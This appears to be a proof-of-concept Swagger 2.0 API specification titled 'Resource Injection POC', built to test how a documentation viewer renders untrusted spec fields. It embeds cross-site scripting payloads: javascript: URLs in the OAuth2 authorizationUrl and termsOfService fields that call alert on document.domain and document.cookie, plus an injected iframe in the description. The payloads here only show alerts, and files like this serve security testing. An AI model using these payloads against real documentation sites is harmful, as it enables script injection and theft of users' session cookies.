swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Resource Injection POC
  description: <h1><iframe width="560" height="315" src="https://www.youtube.com/embed/p5L_s_5zpsQ" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></h1>
  termsOfService: "javascript:alert(document.cookie)"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
